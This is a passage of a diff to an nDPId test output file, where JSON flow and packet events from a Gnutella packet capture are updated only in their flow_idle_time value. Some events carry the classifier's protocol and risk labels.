-00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1298,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":3,"flow_last_seen":99778,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":99778,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gg9AAIAGKkQKAAIPSVn5CMRyxdmnmnGXAAAAAIAC+vCCMAAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1277,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":3,"flow_last_seen":96685,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":96685,"pkt":"UlQAEjUCCAAn5uVZCABFAAA068VAAIAGCcsKAAIPXoaansRp03KjrVDkAAAAAIAC+vDifQAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1278,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":3,"flow_last_seen":96685,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":96685,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0IMxAAIAG1hsKAAIPY8eUBsRoEPJVbcPeAAAAAIAC+vCBnAAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1279,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":3,"flow_last_seen":96685,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":96685,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0aotAAIAGZIwKAAIP3XxCIcRqMwT80GtdAAAAAIAC+vDo1QAAAgQFtAEDAwgBAQQC"} 
+00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1284,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":3,"flow_last_seen":97732,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":97732,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QYRAAIAGx70KAAIPYteCnMRvMHWjnzXtAAAAAIAC+vC0KwAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1285,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":3,"flow_last_seen":97732,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":97732,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QNRAAIAG5KQKAAIPVHZ0xsRurkgo6JHMAAAAAIAC+vBxaAAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1287,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":3,"flow_last_seen":98763,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":98763,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0nYNAAIAGGXUKAAIPSsPs+cRxSH3g2g3bAAAAAIAC+vA0rwAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1288,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":3,"flow_last_seen":98763,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":98763,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0AqZAAIAGaHwKAAIPTHc3HMRwT3sv+xA+AAAAAIAC+vCQWAAAAgQFtAEDAwgBAQQC"} 
+00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1293,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":3,"flow_last_seen":99778,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":99778,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GY1AAIAGqNoKAAIPXwrNQ8R0LVPIsf8hAAAAAIAC+vCCJwAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1294,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":3,"flow_last_seen":99778,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":99778,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0AsFAAIAGpi4KAAIP1eVv4MSREwzLMAmEAAAAAIAC+vB1+AAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1295,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":3,"flow_last_seen":99778,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":99778,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0MidAAIAGHAYKAAIPXjZCUsSB+JU5M3UyAAAAAIAC+vBcCwAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1296,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":3,"flow_last_seen":99778,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":99778,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Rs5AAIAGRA0KAAIPyAeb0sRzbs28TEPZAAAAAIAC+vDQzwAAAgQFtAEDAwgBAQQC"} 
+00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1297,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":3,"flow_last_seen":99778,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":99778,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0O4NAAIAGzRIKAAIPTG6ZscSGnFbyaQhuAAAAAIAC+vAmPAAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1298,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":3,"flow_last_seen":99778,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":99778,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gg9AAIAGKkQKAAIPSVn5CMRyxdmnmnGXAAAAAIAC+vCCMAAAAgQFtAEDAwgBAQQC"} 01405{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1320,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":2,"flow_last_seen":100920,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":100920,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBEAAAEARxyNeNkJSCgACD\/iVcAkC34d4LkYxAuq77b+oti7DkMaMrEQAAMACAAAGR1RLRwAA+wNHJRwgXbAuWugSpAUSxJsCHL8EXjZCUviVAQAAAAR+IhyrFEdUS0cAAOCbIyHZHrkrYnNgnMXp7j9XkbO8BG2EvGL1g1dTSFIAAPJ8p2NaB+IvDcmOjYwpnv4Dgo0cBBinyTW4skdUS0cAAPLJywhbkrobDN\/JQ6AnuEOyGSGjBLBjsBQYykdUS0cAAPdrnSa2ww\/WjIRLC1ipyWI+KDekBGjurPpb\/FdTSFIAAPUb1vVQWKsuipKs18obx69UnmxtBEftyls+9UdUS0cAAPXAlRBP9j9OpxXVbJllgFo1AUWcBFzZVBBO\/0dUS0cAAPk7PafFnhokmbg2Skj0CN9dtWlxBGDszQeH6kdUS0cAAP2LxejmjNINBLJfc3hRxQZnhG+dBK23t27qEEdUS0cAAMJCPsbCyFi2EKuhIjR8FOxLMgMMBKSEChnYBkdUS0cAAMs4SkQs8Plx39K+G3osYia2QR5gBLnsyIm8DkdUS0cAANFgvV19Qr+DjCD+VI9ncRVX3pcfBLyly75V61dTSFIAANEo391sZyCjuFpU0yy2PWYlrl8ABC1Yddsa\/UdUS0cAANCctnuhx+ItXQPhY9ykoz
j36PhcBGD2nH7bBkdUS0cAANY8nyC9cCseHTJEnvv8hZLF1GA+BEn6s+1RcEdUS0cAAN60b0CUs3pQ36DSdMP3NoNcDa2fBFOgjzCQrEdUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan0dUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSA=="} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1450,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101122,"flow_last_seen":101122,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101122,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.105.27","src_port":28681,"dst_port":19260,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1450,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":1,"flow_last_seen":101122,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":101122,"pkt":"UlQAEjUCCAAn5uVZCABFAABt2AwAAIARIW0KAAIPy9xpG3AJSzwAWVR20YMxAsOjfW6uj7unlpr730QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} 
@@ -1096,7 +1096,7 @@ 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1905,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":2,"flow_last_seen":106314,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":106314,"pkt":"UlQAEjUCCAAn5uVZCABFAABtDeEAAIARAL0KAAIPQh7dtXAJLuwAWUvy0dkxAnflHs8XZg0HoKrR0EQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1906,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":2,"flow_last_seen":106314,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":106314,"pkt":"UlQAEjUCCAAn5uVZCABFAABthP0AAIARBkIKAAIPLVh12nAJGv0AWUikdrExAmyl2\/D4Flpgn2PiMkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 00539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1907,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":2,"flow_last_seen":106314,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":106314,"pkt":"UlQAEjUCCAAn5uVZCABFAABtv\/wAAIAR2kwKAAIPucvaXHAJ3oIAWXW3EqAxAn\/MqZ\/PxBBVRWBQQEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1911,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90738,"flow_last_seen":106390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":106390,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"200.7.155.210","src_port":50291,"dst_port":28365,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1911,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90738,"flow_last_seen":106390,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":106390,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"200.7.155.210","src_port":50291,"dst_port":28365,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1940,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":2,"flow_last_seen":111377,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":111377,"pkt":"UlQAEjUCCAAn5uVZCABFAABtaUIAAIARBHoKAAIPSIx4KXAJunsAWR8sGNIxAigwQqvDAye6DaSDvEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1942,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":3,"flow_last_seen":111378,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":111378,"pkt":"UlQAEjUCCAAn5uVZCABFAABt\/AEAAIARkCAKAAIPWHhJ13AJX\/IAWXHaSscxAtAehZxkzy2fwIIymUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1945,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":2,"flow_last_seen":111410,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":111410,"pkt":"UlQAEjUCCAAn5uVZCABFAABtEcUAAIARHzgKAAIPYPacfnAJxHkAWT0ZQMwxAkCcLpcbJhOCUhZqY0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 
@@ -1109,16 +1109,16 @@ 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1958,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":2,"flow_last_seen":111540,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":111540,"pkt":"UlQAEjUCCAAn5uVZCABFAABtGY4AAIAR6JUKAAIPXwrNQ3AJLVMAWRLXRBcxAlgwW8d9kC2rZ7siq0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":3,"flow_last_seen":111540,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":111540,"pkt":"UlQAEjUCCAAn5uVZCABFAABtTIMAAIARTx0KAAIPy9zG9HAJBKoAWTL89yQxAua0C8l8g6aKgyk\/10QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1963,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":2,"flow_last_seen":111857,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":111857,"pkt":"UlQAEjUCCAAn5uVZCABFAABtOYAAAIAR2+4KAAIPSMnQOXAJltkAWbNfr0MxAtDKk1upIWPM3ig4bEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 
-00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1968,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":114930,"flow_last_seen":114930,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":114930,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50327,"dst_port":46906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1968,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":1,"flow_last_seen":114930,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":114930,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bAtAAIAGmk4KAAIPRXai5cSXtzoqx\/sEAAAAAIAC+vDeFgAAAgQFtAEDAwgBAQQC"} -00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1969,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":114930,"flow_last_seen":114930,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":114930,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"189.147.72.83","src_port":50328,"dst_port":26108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1969,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":1,"flow_last_seen":114930,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":114930,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0z\/pAAIAGGNQKAAIPvZNIU8SYZfyEcE5AAAAAAIAC+vBk5AAAAgQFtAEDAwgBAQQC"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1970,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":2,"flow_last_seen":115039,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":115039,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsBeIAAEAGgIBFdqLlCgACD7c6xJcA8yoBKsf7BWAS\/\/\/XGAAAAgQFtA=="} -00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1971,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":3,"flow_last_seen":115039,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":115039,"pkt":"UlQAEjUCCAAn5uVZCABFAAAobAxAAIAGmlkKAAIPRXai5cSXtzoqx\/sFAPMqAlAQ+vDz5AAA"} -00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1972,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":114930,"flow_last_seen":115040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":533,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":115040,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50327,"dst_port":46906,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1974,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":2,"flow_last_seen":115124,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":115124,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsBeQAAEAGYvO9k0hTCgACD2X8xJgA9CQBhHBOQWAS\/\/9j5QAAAgQFtA=="} -00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1975,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":3,"flow_last_seen":115126,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":115126,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoz\/tAAIAGGN8KAAIPvZNIU8SYZfyEcE5BAPQkAlAQ+vCAsQAA"} -00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1976,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":114930,"flow_last_seen":115127,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":538,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":115127,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"189.147.72.83","src_port":50328,"dst_port":26108,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially 
Dangerous","category":"Download"}} +00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1968,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":114930,"flow_last_seen":114930,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":114930,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50327,"dst_port":46906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1968,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":1,"flow_last_seen":114930,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":114930,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bAtAAIAGmk4KAAIPRXai5cSXtzoqx\/sEAAAAAIAC+vDeFgAAAgQFtAEDAwgBAQQC"} +00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1969,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":114930,"flow_last_seen":114930,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":114930,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"189.147.72.83","src_port":50328,"dst_port":26108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1969,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":1,"flow_last_seen":114930,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":114930,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0z\/pAAIAGGNQKAAIPvZNIU8SYZfyEcE5AAAAAAIAC+vBk5AAAAgQFtAEDAwgBAQQC"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1970,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":2,"flow_last_seen":115039,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":115039,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsBeIAAEAGgIBFdqLlCgACD7c6xJcA8yoBKsf7BWAS\/\/\/XGAAAAgQFtA=="} 